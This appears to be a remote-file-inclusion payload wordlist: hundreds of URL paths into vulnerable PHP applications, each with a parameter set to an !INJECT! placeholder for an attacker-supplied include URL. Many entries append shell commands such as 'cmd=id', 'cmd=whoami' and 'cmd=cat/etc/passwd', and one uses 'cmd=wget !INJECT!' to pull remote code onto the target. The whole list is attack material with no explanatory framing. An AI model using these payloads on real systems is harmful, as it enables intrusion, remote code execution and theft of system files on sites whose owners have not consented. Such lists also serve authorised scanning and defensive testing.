/com_media_library/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
|
||||
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
|
||||
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=!INJECT!?
|
||||
/comments.php?AMG_serverpath=!INJECT!
|
||||
/comments.php?scriptpath=!INJECT!?
|
||||
/common.inc.php?CFG[libdir]=!INJECT!
|
||||
/common.inc.php?CFG[libdir]=!INJECT!?
|
||||
/common.inc.php?base_path=!INJECT!
|
||||
/common.php?db_file=!INJECT!
|
||||
/common.php?dir=!INJECT!
|
||||
/common.php?ezt_root_path=!INJECT!?
|
||||
/common.php?include_path=!INJECT!
|
||||
/common.php?livealbum_dir=!INJECT!?
|
||||
/common.php?locale=!INJECT!
|
||||
/common.php?phpht_real_path=!INJECT!?
|
||||
/common/db.php?commonpath=!INJECT!?
|
||||
/common/func.php?CommonAbsD=!INJECT!?
|
||||
/common/func.php?CommonAbsDir=!INJECT!
|
||||
/community/Offline.php?sourcedir=!INJECT!?
|
||||
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=!INJECT!
|
||||
/components/calendar/com_calendar.php?absolute_path=!INJECT!?
|
||||
/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=!INJECT!
|
||||
/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_articles.php?absolute_path=!INJECT!?
|
||||
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_calendar.php?absolute_path=!INJECT!?
|
||||
/components/com_cpg/cpg.php?mosConfig_absolute_path=!INJECT!?
|
||||
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=!INJECT!
|
||||
/components/com_facileforms/facileforms.frame.php?ff_compath=!INJECT!
|
||||
/components/com_forum/download.php?phpbb_root_path=!INJECT!
|
||||
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_guestbook.php?absolute_path=!INJECT!?
|
||||
/components/com_hashcash/server.php?mosConfig_absolute_path=!INJECT!?
|
||||
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_joomlaboard/file_upload.php?sbp=!INJECT!?
|
||||
/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=!INJECT!?
|
||||
/components/com_lm/archive.php?mosConfig_absolute_path=!INJECT!?
|
||||
/components/com_mambowiki/MamboLogin.php?IP=!INJECT!?
|
||||
/components/com_minibb.php?absolute_path=!INJECT!
|
||||
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_mospray/scripts/admin.php?basedir=!INJECT!?&cmd=id
|
||||
/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=!INJECT!
|
||||
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=!INJECT!
|
||||
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=!INJECT!?
|
||||
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=!INJECT!?
|
||||
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=!INJECT!?
|
||||
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=!INJECT!
|
||||
/components/com_smf/smf.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=!INJECT!
|
||||
/components/core/connect.php?language_path=!INJECT!
|
||||
/components/minibb/bb_plugins.php?absolute_path=!INJECT!?
|
||||
/components/minibb/index.php?absolute_path=!INJECT!?
|
||||
/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
|
||||
/compteur/mapage.php?chemin=!INJECT!
|
||||
/conf.php?securelib=!INJECT!
|
||||
/conf.php?securelib=!INJECT!?
|
||||
/config.inc.php3?rel_path=!INJECT!
|
||||
/config.inc.php?_path=!INJECT!
|
||||
/config.inc.php?path_escape=!INJECT!
|
||||
/config.inc.php?path_escape=!INJECT!%00
|
||||
/config.php?full_path=!INJECT!?
|
||||
/config.php?full_path_to_db=!INJECT!
|
||||
/config.php?fullpath=!INJECT!
|
||||
/config.php?incpath=!INJECT!
|
||||
/config.php?path_to_root=!INJECT!
|
||||
/config.php?rel_path=!INJECT!?
|
||||
/config.php?returnpath=!INJECT!
|
||||
/config.php?sql_language=!INJECT!?
|
||||
/config.php?xcart_dir=!INJECT!?
|
||||
/config/config_admin.php?INC=!INJECT!?
|
||||
/config/config_main.php?INC=!INJECT!?
|
||||
/config/config_member.php?INC=!INJECT!?
|
||||
/config/dbutil.bck.php?confdir=!INJECT!
|
||||
/config/mysql_config.php?INC=!INJECT!?
|
||||
/config/sender.php?ROOT_PATH=!INJECT!?
|
||||
/configuration.php?absolute_path=!INJECT!?
|
||||
/confirmUnsubscription.php?output=!INJECT!
|
||||
/connect.php?path=!INJECT!
|
||||
/connexion.php?DOCUMENT_ROOT=!INJECT!?
|
||||
/contact.php?blog_theme=!INJECT!
|
||||
/contacts.php?cal_dir=!INJECT!
|
||||
/contenido/external/frontend/news.php?cfg[path][includes]=!INJECT!
|
||||
/content.php?content=!INJECT!
|
||||
/content/admin.php?pwfile=!INJECT!
|
||||
/content/content.php?fileloc=!INJECT!?
|
||||
/content/delete.php?pwfile=!INJECT!
|
||||
/content/modify.php?pwfile=!INJECT!
|
||||
/content/modify_go.php?pwfile=!INJECT!
|
||||
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=!INJECT!
|
||||
/contrib/mx_glance_sdesc.php?mx_root_path=!INJECT!
|
||||
/contrib/phpBB2/modules.php?phpbb_root_path=!INJECT!?
|
||||
/controllers/MySQLController.php?baseDir=!INJECT!
|
||||
/controllers/SQLController.php?baseDir=!INJECT!
|
||||
/controllers/SetupController.php?baseDir=!INJECT!
|
||||
/controllers/VideoController.php?baseDir=!INJECT!
|
||||
/controllers/ViewController.php?baseDir=!INJECT!
|
||||
/convert-date.php?cal_dir=!INJECT!
|
||||
/convert/mvcw.php?step=1&vwar_root=!INJECT!
|
||||
/convert/mvcw.php?vwar_root=!INJECT!
|
||||
/core/admin/admin.php?p=admin&absoluteurl!INJECT!
|
||||
/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl!INJECT!
|
||||
/core/admin/categories_add.php?absoluteurl!INJECT!
|
||||
/core/admin/categories_remove.php?absoluteurl!INJECT!
|
||||
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl!INJECT!
|
||||
/core/admin/editdel.php?p=admin&absoluteurl!INJECT!
|
||||
/core/admin/ftpfeature.php?p=admin&absoluteurl!INJECT!
|
||||
/core/admin/login.php?absoluteurl!INJECT!
|
||||
/core/admin/pgRSSnews.php?absoluteurl!INJECT!
|
||||
/core/admin/showcat.php?absoluteurl!INJECT!
|
||||
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl!INJECT!
|
||||
/core/archive_cat.php?absoluteurl!INJECT!
|
||||
/core/archive_nocat.php?absoluteurl!INJECT!
|
||||
/core/aural.php?site_absolute_path=!INJECT!
|
||||
/core/aural.php?site_absolute_path=!INJECT!?&cmd=dir
|
||||
/core/editor.php?editor_insert_bottom=!INJECT!
|
||||
/core/includes.php?CMS_ROOT=!INJECT!?
|
||||
/core/recent_list.php?absoluteurl!INJECT!
|
||||
/corpo.php?pagina=!INJECT!
|
||||
/cp2.php?securelib=!INJECT!?
|
||||
/cpe/index.php?repertoire_config=!INJECT!
|
||||
/crea.php?plancia=!INJECT!
|
||||
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=!INJECT!?
|
||||
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=!INJECT!?
|
||||
/creat_news_all.php?language=!INJECT!
|
||||
/create_file.php?target=!INJECT!?
|
||||
/cron.php?ROOT_PATH=!INJECT!
|
||||
/cron.php?include_path=!INJECT!?
|
||||
/crontab/run_billing.php?config[include_dir]=!INJECT!?
|
||||
/cross.php?url=!INJECT!
|
||||
/custom_vars.php?sys[path_addon]=!INJECT!
|
||||
/customer/product.php?xcart_dir=!INJECT!
|
||||
/cwb/comanda.php?INCLUDE_PATH=!INJECT!?
|
||||
/datei.php?config[root_ordner]=!INJECT!?&cmd=id
|
||||
/db/PollDB.php?CONFIG_DATAREADERWRITER=!INJECT!?
|
||||
/db/mysql/db.inc.php?SPL_CFG[dirroot]=!INJECT!?
|
||||
/dbcommon/include.php?_APP_RELATIVE_PATH=!INJECT!
|
||||
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=!INJECT!
|
||||
/debugger.php?config_atkroot=!INJECT!
|
||||
/decoder/gallery.php?ccms_library_path=!INJECT!
|
||||
/decoder/markdown.php?ccms_library_path=!INJECT!
|
||||
/defaults_setup.php?ROOT_PATH=!INJECT!?cmd=ls
|
||||
/defines.php?WEBCHATPATH=!INJECT!?
|
||||
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=!INJECT!&
|
||||
/depouilg.php3?NomVote=!INJECT!?
|
||||
/development.php?root_prefix=!INJECT!?
|
||||
/dfcode.php?DFORUM_PATH=!INJECT!?
|
||||
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=!INJECT!?
|
||||
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=!INJECT!?
|
||||
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!
|
||||
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=!INJECT!?
|
||||
/dialog.php?CONFIG[MWCHAT_Libs]=!INJECT!?
|
||||
/dialogs/a.php?spaw_dir=!INJECT!?&cmd=id
|
||||
/dialogs/collorpicker.php?spaw_dir=!INJECT!&cmd=id
|
||||
/dialogs/img.php?spaw_dir=!INJECT!?&cmd=id
|
||||
/dialogs/img_library.php?spaw_dir=!INJECT!?&cmd=id
|
||||
/dialogs/table.php?spaw_dir=!INJECT!?&cmd=id
|
||||
/dialogs/td.php?spaw_dir=!INJECT!?&cmd=id
|
||||
/digitaleye_Path/module.php?menu=!INJECT!?
|
||||
/dir/prepend.php?_PX_config[manager_path]=!INJECT!
|
||||
/dir_thatware/config.php?root_path=!INJECT!'
|
||||
/direct.php?rf=!INJECT!
|
||||
/direction/index.php?repertoire_config=!INJECT!
|
||||
/directory/index.php?path=!INJECT!
|
||||
/display.php?pag=!INJECT!
|
||||
/display.php?path=!INJECT!
|
||||
/displayCategory.php?basepath=!INJECT!
|
||||
/dix.php3?url_phpartenaire=!INJECT!
|
||||
/dm-albums/template/album.php?SECURITY_FILE=!INJECT!
|
||||
/doc/admin/index.php?ptinclude=!INJECT!
|
||||
/doceboCore/lib/lib.php?GLOBALS[where_framework]=!INJECT!
|
||||
/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=!INJECT!
|
||||
/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=!INJECT!
|
||||
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=!INJECT!
|
||||
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=!INJECT!
|
||||
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=!INJECT!
|
||||
/docs/front-end-demo/cart2.php?workdir=!INJECT!?
|
||||
/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=!INJECT!?&cmd=wget%20!INJECT!
|
||||
/dosearch.php?RESPATH=!INJECT!
|
||||
/download.php?root_prefix=!INJECT!?
|
||||
/download_engine_V1.4.3/addmember.php?eng_dir=!INJECT!
|
||||
/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=!INJECT!
|
||||
/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=!INJECT!
|
||||
/downstat1.8/chart.php?art=!INJECT!?
|
||||
/dp_logs.php?HomeDir=!INJECT!
|
||||
/eXPerience2/modules.php?file=!INJECT!
|
||||
/ea-gBook/index_inc.php?inc_ordner=!INJECT!?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
|
||||
/edit.php?javascript_path=!INJECT!?
|
||||
/editor.php?newsfile=!INJECT!
|
||||
/editprofile.php?pathtohomedir=!INJECT!?
|
||||
/editsite.php?returnpath=!INJECT!
|
||||
/editx/add_address.php?include_dir=!INJECT!
|
||||
/elseif/contenus.php?contenus=!INJECT!
|
||||
/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=!INJECT!
|
||||
/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=!INJECT!
|
||||
/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=!INJECT!
|
||||
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=!INJECT!
|
||||
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign!INJECT!
|
||||
/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=!INJECT!
|
||||
/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=!INJECT!
|
||||
/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=!INJECT!
|
||||
/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=!INJECT!
|
||||
/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=!INJECT!
|
||||
/email_subscribe.php?root_prefix=!INJECT!?
|
||||
/embed/day.php?path=!INJECT!
|
||||
/enc/content.php?Home_Path=!INJECT!?
|
||||
/engine/Ajax/editnews.php?root_dir=!INJECT!
|
||||
/engine/api/api.class.php?dle_config_api=!INJECT!?
|
||||
/engine/engine.inc.php?absolute_path=!INJECT!
|
||||
/engine/init.php?root_dir=!INJECT!
|
||||
/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=!INJECT!?
|
||||
/enth3/show_joined.php?path=!INJECT!
|
||||
/environment.php?DIR_PREFIX=!INJECT!
|
||||
/epal/index.php?view=!INJECT!?
|
||||
/errors.php?error=!INJECT!
|
||||
/errors/configmode.php?GALLERY_BASEDIR=!INJECT!
|
||||
/errors/needinit.php?GALLERY_BASEDIR=!INJECT!
|
||||
/errors/reconfigure.php?GALLERY_BASEDIR=!INJECT!
|
||||
/errors/unconfigured.php?GALLERY_BASEDIR=!INJECT!
|
||||
/es_custom_menu.php?files_dir=!INJECT!
|
||||
/es_desp.php?files_dir=!INJECT!
|
||||
/es_offer.php?files_dir=!INJECT!
|
||||
/eshow.php?Config_rootdir=!INJECT!
|
||||
/esupport/admin/autoclose.php?subd=!INJECT!?
|
||||
/eva/index.php3?aide=!INJECT!?
|
||||
/eva/index.php3?perso=!INJECT!
|
||||
/eva/index.php?eva[caminho]=!INJECT!
|
||||
/event.php?myevent_path=!INJECT!
|
||||
/event_cal/module/embed/day.php?path=!INJECT!
|
||||
/eventcal2.php.php?path_simpnews=!INJECT!
|
||||
/eventscroller.php?path_simpnews=!INJECT!
|
||||
/example-view/templates/article.php?globals[content_dir]=!INJECT!?
|
||||
/example-view/templates/dates_list.php?globals[content_dir]=!INJECT!?
|
||||
/example-view/templates/root.php?globals[content_dir]=!INJECT!?
|
||||
/example.php?site=!INJECT!
|
||||
/example/gamedemo/inc.functions.php?projectPath=!INJECT!?
|
||||
/examplefile.php?bibtexrootrel=!INJECT!?
|
||||
/examples/patExampleGen/bbcodeSource.php?example=!INJECT!
|
||||
/exception/include.php?_APP_RELATIVE_PATH=!INJECT!
|
||||
/extauth/drivers/ldap.inc.php?clarolineRepositorySys=!INJECT!
|
||||
/extras/mt.php?web_root=!INJECT!
|
||||
/extras/poll/poll.php?file_newsportal=!INJECT!
|
||||
/ezusermanager_pwd_forgott.php?ezUserManager_Path=!INJECT!
|
||||
/faq.php?module_root_path=!INJECT!
|
||||
/faq.php?phpbb_root_path=!INJECT!
|
||||
/fckeditor/editor/dialog/fck_link.php?dirroot=!INJECT!
|
||||
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=!INJECT!
|
||||
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=!INJECT!?&cmd=id
|
||||
/fcring.php?s_fuss=!INJECT!
|
||||
/feed.php?config[root_ordner]=!INJECT!?&cmd=id
|
||||
/feed/index2.php?m=!INJECT!
|
||||
/files/amazon-bestsellers.php?CarpPath=!INJECT!
|
||||
/files/carprss.php?CarpPath=!INJECT!
|
||||
/files/compose-attach.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/compose-menu.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/compose-new.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/compose-send.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/folder-create.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/folder-delete.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/folder-empty.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/folder-rename.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/folders.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/login.php3?err=hack&BSX_HTXDIR=!INJECT!
|
||||
/files/mainfile.php?page[path]=!INJECT!?&cmd=ls
|
||||
/files/mbox-list.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/message-delete.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/message-forward.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/message-header.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/message-print.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/message-read.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/message-reply.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/message-replyall.php3?BSX_LIBDIR=!INJECT!
|
||||
/files/message-search.php3?BSX_LIBDIR=!INJECT!
|
||||
/findix/index.php?page=!INJECT!?&cmd=id
|
||||
/fishcart_v3/fc_functions/fc_example.php?docroot=!INJECT!
|
||||
/flushcmd/Include/editor/rich_files/class.rich.php?class_path=!INJECT!?
|
||||
/fonctions/template.php?repphp=!INJECT!?
|
||||
/fonctions_racine.php?chemin_lib=!INJECT!
|
||||
/footer.inc.php?settings[footer]=!INJECT!
|
||||
/footer.inc.php?tfooter=!INJECT!?
|
||||
/footer.php?footer_file=!INJECT!
|
||||
/footer.php?op[footer_body]=!INJECT!?
|
||||
/form.php?path=!INJECT!?&cmd=pwd
|
||||
/forum.php?cfg_file=1&fpath=!INJECT!?
|
||||
/forum/forum.php?view=!INJECT!
|
||||
/forum/forum82lib.php3?repertorylevel=!INJECT!?
|
||||
/forum/gesfil.php?repertorylevel=!INJECT!?
|
||||
/forum/lostpassword.php?repertorylevel=!INJECT!?
|
||||
/forum/mail.php?repertorylevel=!INJECT!?
|
||||
/forum/member.php?repertorylevel=!INJECT!?
|
||||
/forum/message.php?repertorylevel=!INJECT!?
|
||||
/forum/search.php?repertorylevel=!INJECT!?
|
||||
/forum/track.php?path=!INJECT!
|
||||
/frame.php?framefile=!INJECT!
|
||||
/ftp.php?path_local=!INJECT!
|
||||
/function.inc.php?path=!INJECT!
|
||||
/function.php?adminfolder=!INJECT!
|
||||
/function.php?gbpfad=!INJECT!
|
||||
/functions.php?include_path=!INJECT!
|
||||
/functions.php?pmp_rel_path=!INJECT!
|
||||
/functions.php?s[phppath]=!INJECT!
|
||||
/functions.php?set_path=!INJECT!?
|
||||
/functions/form.func.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/functions/general.func.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/functions/groups.func.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/functions/js.func.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/functions/prepend_adm.php?SETS[path][physical]=!INJECT!
|
||||
/functions/prepend_adm.php?SETS[path][physical]=!INJECT!?
|
||||
/functions/sections.func.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/functions/users.func.php?GLOBALS[PTH][classes]=!INJECT!?
|
||||
/functions_mod_user.php?phpbb_root_path=!INJECT!?&cmd=ls
|
||||
/fusebox5.php?FUSEBOX_APPLICATION_PATH=!INJECT!
|
||||
/galerie.php?config[root_ordner]=!INJECT!?cmd=id
|
||||
/gallery/captionator.php?GALLERY_BASEDIR=!INJECT!
|
||||
/gallery/lib/content.php?include=!INJECT!?cmd=ls
|
||||
/gallery/theme/include_mode/template.php?galleryfilesdir=!INJECT!
|
||||
/gallerypath/index.php?includepath=!INJECT!
|
||||
/games.php?id=!INJECT!
|
||||
/games.php?scoreid=!INJECT!
|
||||
/gbook/includes/header.php?abspath=!INJECT!?
|
||||
/gemini/page/forums/bottom.php?lang=!INJECT!?
|
||||
/gen_m3u.php?phpbb_root_path=!INJECT!
|
||||
/genepi.php?topdir=!INJECT!
|
||||
/generate.php?ht_pfad=!INJECT!?
|
||||
/gepi/gestion/savebackup.php?filename=!INJECT!&cmd=cat/etc/passwd
|
||||
/gestArt/aide.php3?aide=!INJECT!?
|
||||
/get_session_vars.php?path_to_smf=!INJECT!
|
||||
/getpage.php?page=online&doc_path=!INJECT!
|
||||
/global.php?abs_path=!INJECT!?
|
||||
/gorum/dbproperty.php?appDirName=!INJECT!
|
||||
/gpb/include/db.mysql.inc.php?root_path=!INJECT!?
|
||||
/gpb/include/gpb.inc.php?root_path=!INJECT!?
|
||||
/graph.php?DOCUMENT_ROOT=!INJECT!?
|
||||
/gruppen.php?config[root_ordner]=!INJECT!?&cmd=id
|
||||
/handlers/email/mod.listmail.php?_PM_[path][handle]=!INJECT!
|
||||
/handlers/page/show.php?sous_rep=!INJECT!
|
||||
/head.php?CONFIG[MWCHAT_Libs]=!INJECT!?
|
||||
/header.inc.php?CssFile=!INJECT!
|
||||
/header.php?path=!INJECT!
|
||||
/header.php?wwwRoot=!INJECT!
|
||||
/help.php?CONFIG[MWCHAT_Libs]=!INJECT!?
|
||||
/help/index.php?show=!INJECT!
|
||||
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
|
||||
/helperfunction.php?includedir=!INJECT!
|
||||
/hioxBannerRotate.php?hm=!INJECT!
|
||||
/hioxRandomAd.php?hm=!INJECT!
|
||||
/hioxstats.php?hm=!INJECT!
|
||||
/hioxupdate.php?hm=!INJECT!
|
||||
/home.php?a=!INJECT!
|
||||
/home.php?page=!INJECT!
|
||||
/home.php?pagina=!INJECT!
|
||||
/home/www/images/doc/index2.php?type=!INJECT!
|
||||
/home1.php?ln=!INJECT!
|
||||
/home2.php?ln=!INJECT!
|
||||
/hsList.php?subdir=!INJECT!?&cmd=ls
|
||||
/htdocs/gmapfactory/params.php?gszAppPath=!INJECT!
|
||||
/html/admin/modules/plugin_admin.php?_settings[pluginpath]=!INJECT!
|
||||
/hu/modules/reg-new/modstart.php?mod_dir=!INJECT!?
|
||||
/i_head.php?home=!INJECT!
|
||||
/i_nav.php?home=!INJECT!
|
||||
/iframe.php?file=!INJECT!
|
||||
/image.php?url=!INJECT!???
|
||||
/impex/ImpExData.php?systempath=!INJECT!
|
||||
/import.php?bibtexrootrel=!INJECT!?
|
||||
/importinfo.php?bibtexrootrel=!INJECT!?
|
||||
/in.php?returnpath=!INJECT!
|
||||
/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=!INJECT!
|
||||
/inc/config.inc.php?x[1]=!INJECT!
|
||||
/inc/design.inc.php?dir[data]=!INJECT!
|
||||
/inc/download_center_lite.inc.php?script_root=!INJECT!
|
||||
/inc/formmail.inc.php?script_root=!INJECT!
|
||||
/inc/gabarits.php?cfg_racine=!INJECT!
|
||||
/inc/header.inc.php?ficStyle=!INJECT!
|
||||
/inc/ifunctions.php?GLOBALS[phpQRootDir]=!INJECT!
|
||||
/inc/inc.php?cfg_racine=!INJECT!?
|
||||
/inc/indexhead.php?fileloc=!INJECT!?
|
||||
/inc/irayofuncs.php?irayodirhack=!INJECT!?
|
||||
/inc/libs/Smarty_Compiler.class.php?plugin_file=!INJECT!?
|
||||
/inc/libs/core/core.display_debug_console.php?plugin_file=!INJECT!?
|
||||
/inc/libs/core/core.load_plugins.php?plugin_file=!INJECT!?
|
||||
/inc/libs/core/core.load_resource_plugin.php?plugin_file=!INJECT!?
|
||||
/inc/libs/core/core.process_cached_inserts.php?plugin_file=!INJECT!?
|
||||
/inc/libs/core/core.process_compiled_include.php?plugin_file=!INJECT!?
|
||||
/inc/libs/core/core.read_cache_file.php?plugin_file=!INJECT!?
|
||||
/inc/linkbar.php?cfile=!INJECT!?
|
||||
/inc/login.php?pathCGX=!INJECT!
|
||||
/inc/logingecon.php?pathCGX=!INJECT!
|
||||
/inc/ltdialogo.php?pathCGX=!INJECT!
|
||||
/inc/mtdialogo.php?pathCGX=!INJECT!
|
||||
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=!INJECT!?
|
||||
/inc/prepend.inc.php?path=!INJECT!?
|
||||
/inc/service.alert.inc.php?SPL_CFG[dirroot]=!INJECT!?
|
||||
/inc/settings.php?inc_dir=!INJECT!
|
||||
/inc/settings.ses.php?SPL_CFG[dirroot]=!INJECT!?
|
||||
/inc/shows.inc.php?cutepath=!INJECT!?
|
||||
/inc/sige_init.php?SYS_PATH=!INJECT!?
|
||||
/inc_group.php?include_path=!INJECT!?
|
||||
/inc_manager.php?include_path=!INJECT!?
|
||||
/inc_newgroup.php.php?include_path=!INJECT!?
|
||||
/inc_smb_conf.php?include_path=!INJECT!?
|
||||
/inc_user.php?include_path=!INJECT!?
|
||||
/include.php?_APP_RELATIVE_PATH=!INJECT!
|
||||
/include.php?gorumDir=!INJECT!
|
||||
/include.php?myng_root=!INJECT!
|
||||
/include.php?path=psp/user.php&site=!INJECT!
|
||||
/include.php?path[docroot]=!INJECT!
|
||||
/include.php?sunPath=!INJECT!
|
||||
/include/Beautifier/Core.php?BEAUT_PATH=!INJECT!
|
||||
/include/HTML_oben.php?include_path=!INJECT!
|
||||
/include/HTML_oben.php?include_path=!INJECT!?
|
||||
/include/SQuery/gameSpy2.php?libpath=!INJECT!
|
||||
/include/bbs.lib.inc.php?site_path=!INJECT!
|
||||
/include/class_yapbbcooker.php?cfgIncludeDirectory=!INJECT!
|
||||
/include/classes.php?INCLUDE_DIR=!INJECT!?
|
||||
/include/client.php?INCLUDE_DIR=!INJECT!?
|
||||
/include/cls_headline_prod.php?INCLUDE_PATH=!INJECT!
|
||||
/include/cls_listorders.php?INCLUDE_PATH=!INJECT!
|
||||
/include/cls_viewpastorders.php?INCLUDE_PATH=!INJECT!
|
||||
/include/common.php?XOOPS_ROOT_PATH=!INJECT!
|
||||
/include/common_functions.php?baros_path=!INJECT!?
|
||||
/include/config.inc.php?racine=!INJECT!
|
||||
/include/copyright.php?tsep_config[absPath]=!INJECT!?cmd=ls
|
||||
/include/customize.php?l=!INJECT!&text=Hello%20World
|
||||
/include/default_header.php?script_path=!INJECT!
|
||||
/include/define.php?INC_DIR=!INJECT!?
|
||||
/include/disp_form.php3?cfg_include_dir=!INJECT!?
|
||||
/include/disp_smileys.php3?cfg_include_dir=!INJECT!?
|
||||
/include/dom.php?path=!INJECT!
|
||||
/include/dtd.php?path=!INJECT!
|
||||
/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=!INJECT!?
|
||||
/include/engine/content/elements/menu.php?CONFIG[AdminPath]=!INJECT!
|
||||
/include/forms.php?INCLUDE_DIR=!INJECT!?
|
||||
/include/global.php?pfad=!INJECT!
|
||||
/include/header.php?cs_base_path=!INJECT!?
|
||||
/include/html/nettools.popup.php?DIR=!INJECT!
|
||||
/include/inc.foot.php?root=!INJECT!
|
||||
/include/inc_ext/spaw/dialogs/table.php?spaw_root=!INJECT!
|
||||
/include/inc_freigabe.php?include_path=!INJECT!?
|
||||
/include/inc_freigabe1.php?include_path=!INJECT!?
|
||||
/include/inc_freigabe3.php?include_path=!INJECT!?
|
||||
/include/include_stream.inc.php?include_path=!INJECT!
|
||||
/include/include_top.php?g_include=!INJECT!
|
||||
/include/includes.php?include_path=!INJECT!
|
||||
/include/index.php3?cfg_include_dir=!INJECT!?
|
||||
/include/init.inc.php?G_PATH=!INJECT!
|
||||
